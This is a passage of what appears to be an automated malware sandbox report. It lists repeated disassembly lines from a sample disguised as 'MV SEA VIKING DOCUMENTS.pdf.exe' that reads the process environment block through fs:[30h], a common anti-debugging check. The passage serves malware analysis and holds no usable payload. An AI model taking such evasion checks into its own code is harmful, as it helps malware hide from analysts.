      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BD71 mov eax, dword ptr fs:[00000030h]13_2_1F20BD71
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDD4D mov eax, dword ptr fs:[00000030h]13_2_1F1EDD4D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDD4D mov eax, dword ptr fs:[00000030h]13_2_1F1EDD4D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDD4D mov eax, dword ptr fs:[00000030h]13_2_1F1EDD4D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C9D46 mov eax, dword ptr fs:[00000030h]13_2_1F1C9D46
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C9D46 mov eax, dword ptr fs:[00000030h]13_2_1F1C9D46
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C9D46 mov ecx, dword ptr fs:[00000030h]13_2_1F1C9D46
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F276D79 mov esi, dword ptr fs:[00000030h]13_2_1F276D79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4D4B mov eax, dword ptr fs:[00000030h]13_2_1F2A4D4B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24CD40 mov eax, dword ptr fs:[00000030h]13_2_1F24CD40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24CD40 mov eax, dword ptr fs:[00000030h]13_2_1F24CD40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F295D43 mov eax, dword ptr fs:[00000030h]13_2_1F295D43
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F295D43 mov eax, dword ptr fs:[00000030h]13_2_1F295D43
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251D5E mov eax, dword ptr fs:[00000030h]13_2_1F251D5E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E5D60 mov eax, dword ptr fs:[00000030h]13_2_1F1E5D60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6D91 mov eax, dword ptr fs:[00000030h]13_2_1F1D6D91
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4DA7 mov eax, dword ptr fs:[00000030h]13_2_1F2A4DA7
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCD8A mov eax, dword ptr fs:[00000030h]13_2_1F1CCD8A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCD8A mov eax, dword ptr fs:[00000030h]13_2_1F1CCD8A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202DBC mov eax, dword ptr fs:[00000030h]13_2_1F202DBC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202DBC mov ecx, dword ptr fs:[00000030h]13_2_1F202DBC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D7DB6 mov eax, dword ptr fs:[00000030h]13_2_1F1D7DB6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CDDB0 mov eax, dword ptr fs:[00000030h]13_2_1F1CDDB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C6DA6 mov eax, dword ptr fs:[00000030h]13_2_1F1C6DA6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29CDEB mov eax, dword ptr fs:[00000030h]13_2_1F29CDEB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F29CDEB mov eax, dword ptr fs:[00000030h]13_2_1F29CDEB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C8DCD mov eax, dword ptr fs:[00000030h]13_2_1F1C8DCD
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F27FDF4 mov eax, dword ptr fs:[00000030h]13_2_1F27FDF4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEDFA mov eax, dword ptr fs:[00000030h]13_2_1F1CEDFA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DBDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1DBDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28ADD6 mov eax, dword ptr fs:[00000030h]13_2_1F28ADD6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28ADD6 mov eax, dword ptr fs:[00000030h]13_2_1F28ADD6
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FFDE0 mov eax, dword ptr fs:[00000030h]13_2_1F1FFDE0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F295C38 mov eax, dword ptr fs:[00000030h]13_2_1F295C38
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F295C38 mov ecx, dword ptr fs:[00000030h]13_2_1F295C38
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F204C3D mov eax, dword ptr fs:[00000030h]13_2_1F204C3D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F267C38 mov eax, dword ptr fs:[00000030h]13_2_1F267C38
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C8C3D mov eax, dword ptr fs:[00000030h]13_2_1F1C8C3D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202C10 mov eax, dword ptr fs:[00000030h]13_2_1F202C10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202C10 mov eax, dword ptr fs:[00000030h]13_2_1F202C10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202C10 mov eax, dword ptr fs:[00000030h]13_2_1F202C10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202C10 mov eax, dword ptr fs:[00000030h]13_2_1F202C10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EAC20 mov eax, dword ptr fs:[00000030h]13_2_1F1EAC20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EAC20 mov eax, dword ptr fs:[00000030h]13_2_1F1EAC20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EAC20 mov eax, dword ptr fs:[00000030h]13_2_1F1EAC20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BC6E mov eax, dword ptr fs:[00000030h]13_2_1F20BC6E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BC6E mov eax, dword ptr fs:[00000030h]13_2_1F20BC6E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CDC40 mov eax, dword ptr fs:[00000030h]13_2_1F1CDC40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C40 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D0C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D0C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D0C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D0C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D8C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D8C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D8C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D8C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8C79 mov eax, dword ptr fs:[00000030h]13_2_1F1D8C79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F253C57 mov eax, dword ptr fs:[00000030h]13_2_1F253C57
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4C59 mov eax, dword ptr fs:[00000030h]13_2_1F2A4C59
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCC68 mov eax, dword ptr fs:[00000030h]13_2_1F1CCC68
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov ecx, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov ecx, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov ecx, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov ecx, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov ecx, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov ecx, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E3C60 mov eax, dword ptr fs:[00000030h]13_2_1F1E3C60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D7C95 mov eax, dword ptr fs:[00000030h]13_2_1F1D7C95
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D7C95 mov eax, dword ptr fs:[00000030h]13_2_1F1D7C95
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7C85 mov eax, dword ptr fs:[00000030h]13_2_1F1C7C85
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7C85 mov eax, dword ptr fs:[00000030h]13_2_1F1C7C85
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7C85 mov eax, dword ptr fs:[00000030h]13_2_1F1C7C85
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7C85 mov eax, dword ptr fs:[00000030h]13_2_1F1C7C85
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7C85 mov eax, dword ptr fs:[00000030h]13_2_1F1C7C85
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F253C80 mov ecx, dword ptr fs:[00000030h]13_2_1F253C80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28FC95 mov eax, dword ptr fs:[00000030h]13_2_1F28FC95
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F279C98 mov ecx, dword ptr fs:[00000030h]13_2_1F279C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F279C98 mov eax, dword ptr fs:[00000030h]13_2_1F279C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F279C98 mov eax, dword ptr fs:[00000030h]13_2_1F279C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F279C98 mov eax, dword ptr fs:[00000030h]13_2_1F279C98
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8CDF mov eax, dword ptr fs:[00000030h]13_2_1F1F8CDF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8CDF mov eax, dword ptr fs:[00000030h]13_2_1F1F8CDF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F250CEE mov eax, dword ptr fs:[00000030h]13_2_1F250CEE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F267CE8 mov eax, dword ptr fs:[00000030h]13_2_1F267CE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDCD1 mov eax, dword ptr fs:[00000030h]13_2_1F1EDCD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDCD1 mov eax, dword ptr fs:[00000030h]13_2_1F1EDCD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDCD1 mov eax, dword ptr fs:[00000030h]13_2_1F1EDCD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DFCC9 mov eax, dword ptr fs:[00000030h]13_2_1F1DFCC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24CCF0 mov ecx, dword ptr fs:[00000030h]13_2_1F24CCF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C6CC0 mov eax, dword ptr fs:[00000030h]13_2_1F1C6CC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C6CC0 mov eax, dword ptr fs:[00000030h]13_2_1F1C6CC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C6CC0 mov eax, dword ptr fs:[00000030h]13_2_1F1C6CC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F206CC0 mov eax, dword ptr fs:[00000030h]13_2_1F206CC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FECF3 mov eax, dword ptr fs:[00000030h]13_2_1F1FECF3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FECF3 mov eax, dword ptr fs:[00000030h]13_2_1F1FECF3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7CF1 mov eax, dword ptr fs:[00000030h]13_2_1F1C7CF1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3CF0 mov eax, dword ptr fs:[00000030h]13_2_1F1D3CF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3CF0 mov eax, dword ptr fs:[00000030h]13_2_1F1D3CF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F209CCF mov eax, dword ptr fs:[00000030h]13_2_1F209CCF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CCD1 mov ecx, dword ptr fs:[00000030h]13_2_1F20CCD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CCD1 mov eax, dword ptr fs:[00000030h]13_2_1F20CCD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CCD1 mov eax, dword ptr fs:[00000030h]13_2_1F20CCD1
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F263CD4 mov eax, dword ptr fs:[00000030h]13_2_1F263CD4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F263CD4 mov eax, dword ptr fs:[00000030h]13_2_1F263CD4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F263CD4 mov ecx, dword ptr fs:[00000030h]13_2_1F263CD4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F263CD4 mov eax, dword ptr fs:[00000030h]13_2_1F263CD4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F263CD4 mov eax, dword ptr fs:[00000030h]13_2_1F263CD4
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F255CD0 mov eax, dword ptr fs:[00000030h]13_2_1F255CD0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4CD2 mov eax, dword ptr fs:[00000030h]13_2_1F2A4CD2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CB20 mov eax, dword ptr fs:[00000030h]13_2_1F20CB20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCB1E mov eax, dword ptr fs:[00000030h]13_2_1F1CCB1E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FEB1C mov eax, dword ptr fs:[00000030h]13_2_1F1FEB1C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CB20 mov eax, dword ptr fs:[00000030h]13_2_1F25CB20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CB20 mov eax, dword ptr fs:[00000030h]13_2_1F25CB20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CB20 mov eax, dword ptr fs:[00000030h]13_2_1F25CB20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8B10 mov eax, dword ptr fs:[00000030h]13_2_1F1D8B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8B10 mov eax, dword ptr fs:[00000030h]13_2_1F1D8B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D8B10 mov eax, dword ptr fs:[00000030h]13_2_1F1D8B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0B10 mov eax, dword ptr fs:[00000030h]13_2_1F1E0B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0B10 mov eax, dword ptr fs:[00000030h]13_2_1F1E0B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0B10 mov eax, dword ptr fs:[00000030h]13_2_1F1E0B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0B10 mov eax, dword ptr fs:[00000030h]13_2_1F1E0B10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25DB2A mov eax, dword ptr fs:[00000030h]13_2_1F25DB2A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F211B0F mov eax, dword ptr fs:[00000030h]13_2_1F211B0F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F211B0F mov eax, dword ptr fs:[00000030h]13_2_1F211B0F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25DB1B mov eax, dword ptr fs:[00000030h]13_2_1F25DB1B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4B67 mov eax, dword ptr fs:[00000030h]13_2_1F2A4B67
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F204B79 mov eax, dword ptr fs:[00000030h]13_2_1F204B79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F286B77 mov eax, dword ptr fs:[00000030h]13_2_1F286B77
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25FB45 mov eax, dword ptr fs:[00000030h]13_2_1F25FB45
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7B7D mov eax, dword ptr fs:[00000030h]13_2_1F1C7B7D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C7B7D mov ecx, dword ptr fs:[00000030h]13_2_1F1C7B7D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BB40 mov ecx, dword ptr fs:[00000030h]13_2_1F28BB40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BB40 mov eax, dword ptr fs:[00000030h]13_2_1F28BB40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAB70 mov eax, dword ptr fs:[00000030h]13_2_1F1DAB70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAB70 mov eax, dword ptr fs:[00000030h]13_2_1F1DAB70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAB70 mov eax, dword ptr fs:[00000030h]13_2_1F1DAB70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAB70 mov eax, dword ptr fs:[00000030h]13_2_1F1DAB70
